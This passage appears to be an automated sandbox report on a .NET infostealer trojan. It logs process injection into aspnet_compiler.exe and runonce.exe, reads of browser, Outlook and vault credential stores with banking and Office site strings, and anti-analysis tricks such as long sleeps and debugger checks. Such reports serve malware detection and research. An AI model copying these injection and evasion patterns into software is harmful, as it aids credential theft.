                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_003656707_2_00365670
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0036387B7_2_0036387B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_003638807_2_00363880
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0037BE507_2_0037BE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EE4677_2_043EE467
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EE7FC7_2_043EE7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043ED8C87_2_043ED8C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0175B970 appears 277 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 017B7E54 appears 111 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 017EF290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 017DEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 017A5130 appears 58 times
                Source: C:\Windows\SysWOW64\runonce.exe Code function: String function: 04605130 appears 58 times
                Source: C:\Windows\SysWOW64\runonce.exe Code function: String function: 0464F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exe Code function: String function: 04617E54 appears 111 times
                Source: C:\Windows\SysWOW64\runonce.exe Code function: String function: 045BB970 appears 277 times
                Source: C:\Windows\SysWOW64\runonce.exe Code function: String function: 0463EA12 appears 86 times
                Source: uI1A364y2P.exe, 00000001.00000002.1403612311.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs uI1A364y2P.exe
                Source: uI1A364y2P.exe, 00000001.00000000.1375297221.0000000000B5A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCZXSYYS.exe0 vs uI1A364y2P.exe
                Source: uI1A364y2P.exe Binary or memory string: OriginalFilenameCZXSYYS.exe0 vs uI1A364y2P.exe
                Source: uI1A364y2P.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: uI1A364y2P.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/2@6/5
                Source: C:\Users\user\Desktop\uI1A364y2P.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uI1A364y2P.exe.log
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\runonce.exe File created: C:\Users\user~1\AppData\Local\Temp\6511-iOQ--
                Source: uI1A364y2P.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: runonce.exe, 00000007.00000003.2094743313.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.2094743313.0000000000779000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2621389939.0000000000779000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2621389939.00000000007AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: uI1A364y2P.exe ReversingLabs: Detection: 62%
                Source: uI1A364y2P.exe Virustotal: Detection: 51%
                Source: unknown Process created: C:\Users\user\Desktop\uI1A364y2P.exe "C:\Users\user\Desktop\uI1A364y2P.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Windows\SysWOW64\runonce.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: uI1A364y2P.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: uI1A364y2P.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: uI1A364y2P.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: CZXSYYS.pdb source: uI1A364y2P.exe
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zk0NoejtsplNyT.exe, 00000006.00000002.2621245081.00000000004FF000.00000002.00000001.01000000.00000008.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2621245434.00000000004FF000.00000002.00000001.01000000.00000008.sdmp

                Data Obfuscation

                Source: uI1A364y2P.exe, -Module-.cs.Net Code: _206E_202A_202A_200D_200C_206F_200B_200C_200B_200D_206D_202C_202E_202D_200E_200C_202D_200B_202C_202E_200E_206D_200E_206D_200F_206F_200D_202A_200D_200C_206D_202E_206F_200E_206D_206D_206A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: uI1A364y2P.exeStatic PE information: 0xC2A7E558 [Tue Jun 27 09:58:48 2073 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041F04F push ebx; ret 4_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00403280 push eax; ret 4_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AB61 pushfd ; ret 4_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041ABD6 push ds; ret 4_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040D38A push edx; iretd 4_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00426CC3 pushad ; iretd 4_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084DA push esi; retf 4_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084FF push ebp; iretd 4_2_00408502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00412559 push ecx; iretd 4_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004125DC pushfd ; iretd 4_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00405E25 push ecx; ret 4_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00401F0E push ss; retf 4_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0173225F pushad ; ret 4_2_017327F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017327FA pushad ; ret 4_2_017327F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017609AD push ecx; mov dword ptr [esp], ecx4_2_017609B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0173283D push eax; iretd 4_2_01732858
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEE3E1 push edx; iretd 6_2_03EEE4AA
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EFBBB8 pushfd ; ret 6_2_03EFBBCF
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF4EB0 push 2C1D344Fh; ret 6_2_03EF4EB7
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE6E7C push ecx; ret 6_2_03EE6E82
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF3633 pushfd ; iretd 6_2_03EF3652
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF35B0 push ecx; iretd 6_2_03EF35B1
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE9556 push ebp; iretd 6_2_03EE9559
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF753E push eax; ret 6_2_03EF754A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE9531 push esi; retf 6_2_03EE9534
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EFBC2D push ds; ret 6_2_03EFBC2F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C09AD push ecx; mov dword ptr [esp], ecx7_2_045C09B6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00352BA2 push ecx; ret 7_2_00352BA8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035527C push ebp; iretd 7_2_0035527F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00355257 push esi; retf 7_2_0035525A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035F2D6 push ecx; iretd 7_2_0035F2D7
                Source: uI1A364y2P.exeStatic PE information: section name: .text entropy: 7.873691427098965
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 1170000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 2F60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 54A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 64A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 65D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 75D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 7930000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 8930000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 9930000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E rdtsc 4_2_017A096E
                Source: C:\Users\user\Desktop\uI1A364y2P.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 4460
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 5512
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\uI1A364y2P.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep count: 4460 > 30
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep time: -8920000s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep count: 5512 > 30
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep time: -11024000s >= -30000s
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe TID: 8084Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0036C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C8D0
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 6511-iOQ--.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 6511-iOQ--.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - COM.HKVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 6511-iOQ--.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 6511-iOQ--.7.drBinary or memory string: discord.comVMware20,11696492231f
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2621634609.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2207962451.000001AE36CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,P
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696492231d
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware
                Source: 6511-iOQ--.7.drBinary or memory string: global block list test formVMware20,11696492231
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
                Source: 6511-iOQ--.7.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 6511-iOQ--.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 6511-iOQ--.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 6511-iOQ--.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231o
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696492231n
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231@
                Source: runonce.exe, 00000007.00000002.2621389939.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&(
                Source: 6511-iOQ--.7.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E rdtsc 4_2_017A096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00417A93 LdrLoadDll,4_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01804180 mov eax, dword ptr fs:[00000030h]4_2_01804180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181C188 mov eax, dword ptr fs:[00000030h]4_2_0181C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766154 mov eax, dword ptr fs:[00000030h]4_2_01766154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C156 mov eax, dword ptr fs:[00000030h]4_2_0175C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F8158 mov eax, dword ptr fs:[00000030h]4_2_017F8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov eax, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov ecx, dword ptr fs:[00000030h]4_2_017F4144
